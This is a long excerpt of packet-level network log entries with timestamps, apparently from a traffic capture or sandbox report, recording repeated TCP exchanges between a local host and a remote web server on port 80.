                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.491976976 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.492017031 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.493057013 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.493107080 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.493153095 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.493210077 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.494215965 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.494262934 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.494282961 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.494321108 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.495384932 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.495419979 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.495517015 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.495559931 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.496572971 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.496614933 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.496644974 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.496685028 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.497759104 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.497800112 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.498126984 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.498167992 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.498873949 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.498915911 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.498971939 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.499006033 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.500017881 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.500061035 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.500076056 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.500121117 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.501216888 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.501262903 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.501389980 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.501432896 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.502409935 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.502449989 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.502592087 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.502633095 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.503535986 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.503578901 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.503578901 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.503618956 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.504724979 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.504765987 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.504842043 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.504889965 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.505852938 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.505896091 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.506046057 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.506124973 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.507015944 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.507052898 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.507137060 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.507179022 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.508220911 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.508261919 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.508332968 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.508373022 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.509464025 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.509509087 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.509572029 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.509610891 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.510540009 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.510586023 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.510629892 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.510668993 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.511730909 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.512064934 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.512108088 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.512909889 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.513008118 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.513060093 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.514219999 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.514264107 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.514336109 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.515219927 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.515261889 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.515350103 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.516360998 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.516407967 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.516449928 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.517513037 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.517558098 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.517586946 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.517638922 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.518656969 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.518742085 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.518783092 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.519824028 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.519932032 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.519975901 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.521009922 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.521112919 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.521157026 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.522161961 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.522205114 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.522325993 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.523333073 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.523365974 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.523380995 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.523408890 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.524477005 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.524595976 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.524638891 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.525676012 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.525798082 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.525842905 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.526782036 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.526835918 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.657771111 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.657922029 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.657968998 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.658346891 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.658492088 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.658529997 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.659516096 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.659557104 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.659565926 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.659781933 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.660716057 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.660763979 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.660855055 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.660898924 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.661850929 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.661894083 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.661986113 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.662153959 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.663064957 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.663108110 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.663156986 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.663194895 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.664185047 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.664227962 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.664273024 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.664310932 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.665342093 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.665472031 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.665509939 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.666520119 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.666640997 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.666683912 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.667689085 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.667727947 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.667790890 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.667844057 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.668828964 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.668869019 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.668957949 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.669003010 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.670017004 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.670056105 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.670119047 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.670161009 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.671214104 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.671262980 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.671298027 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.671339035 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.672342062 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.672461033 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.672504902 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.672552109 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.673532963 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.673583031 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.673592091 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.673636913 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.674668074 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.674719095 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.674724102 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.674761057 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.675867081 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.675908089 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.675940990 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.675988913 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.677026987 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.677071095 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.677135944 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.677179098 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.678199053 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.678261042 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.678277969 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.678307056 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.679373026 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.679472923 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.679513931 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.680495977 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.680618048 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.680655956 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.681649923 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.681689978 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.681761980 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.681943893 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.682801008 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.682917118 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.682919025 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.682956934 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.684000015 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.684041023 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.684086084 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.684128046 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.685153008 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.685255051 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.685259104 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.685288906 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.686296940 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.686340094 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.686583996 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.687048912 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.687495947 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.687539101 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.687604904 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.687644958 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.688652039 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.688692093 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.688774109 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.688811064 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.689816952 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.689857006 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.689907074 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.689946890 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.690970898 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.691013098 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.691076994 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.691118002 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.692136049 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.692178011 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.692241907 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.692281961 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.693295956 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.693342924 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.693406105 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.693447113 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.694468021 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.694509983 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.694554090 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.694595098 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.695616007 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.695655107 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.695734024 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.695775032 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.696788073 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.696830034 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.696894884 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.696934938 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.697956085 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.697999001 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.698090076 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.698127031 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.699120045 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.699161053 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.699249029 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.699290991 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.700275898 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.700315952 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.700417995 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.700457096 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.701448917 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.701492071 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.701572895 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.701615095 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.702622890 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.702663898 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.702738047 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.702775002 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.703821898 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.703860998 CET4982880192.168.2.531.41.244.11
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.703911066 CET804982831.41.244.11192.168.2.5
                                                                                                                                                                                                                                                                          Dec 21, 2024 01:14:17.703948975 CET4982880192.168.2.531.41.244.11
